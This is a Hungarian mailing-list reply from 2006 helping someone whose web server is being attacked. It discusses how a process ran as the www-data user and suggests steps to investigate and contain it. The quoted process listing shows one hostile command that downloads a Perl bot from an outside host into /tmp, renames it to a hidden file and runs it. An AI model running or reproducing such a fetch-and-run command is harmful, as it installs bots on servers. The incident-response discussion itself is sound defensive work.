Segitseg, tamadjak a webszerveremet
Kulyassa Robert
qji at csoma.elte.hu
2006. Okt. 5., Cs, 01:21:50 CEST
> >sh-t inditanak? Huh, hat ez eleg csunyan hangzik -az eddigiekhez kepest-
> >ez azt jelenti, hogy mar bent vannak. Biztos vagy benne?
>
> Nem, nem vagyok. Nem vagyok egy Linux guru. A fősulin 1 évig tanultam
> Linuxot,
En semmilyen iskolaban nem tanultam ezt. ;)
> Ami az sh-t illeti, amint első levelemben írtam:
>
> ps kimenete (részlet):
>
> www-data 2715 0.0 0.2 2476 1160 ? S 11:26 0:00 sh -c cd /tmp; wget http://cmgforum.net/botek.txt; mv botek.txt .sessx; perl .sessx; rem botek.txt.*; wget .... blablabla
Hmm. Hat ez eleg csunya, telleg.
Azonban jo hir, hogy egyelore (ugy tunik) csak a www-data user neveben
garazdalkodnak. :)
> Elég egyértelmű, hogy mit akar csinálni, de már a /tmp-be sem tud
> bejutni. Az apache error.log-ja tele van a próbálkozásokkal (permission
> denied, file not exist stb.)
Valoszinuleg nem lehet futtatni a /tmp-ben... kuldj egy "mount"
kimenetet lecci.
Ha nem fontos a web, akkor allitsd le a webszervert es lojj le minden
www-data userhez tartozo processzt. Bar szerintem ehelyett eloszor
vizsgalodni, nezelodni tanulsagosabb...
Meg mondjuk crontab job-ja meg mindig lehet... bar nem valoszinu.
> Amit nem értek, és ezért nagyon zavar, az a sh -c része. A www-data
> user-nek a /bin/false a shell-je.
Igen, ezert nem tud belepni mondjuk ssh-n. De mondjuk crontab-bol (vagy
php exec vagy minek hivjak ezt phpul) miert ne futtathatna programokat.
Es ekkor mar az sh ugyanolyan program mint barmely masik.
--
qji
További információk a(z) Techinfo levelezőlistáról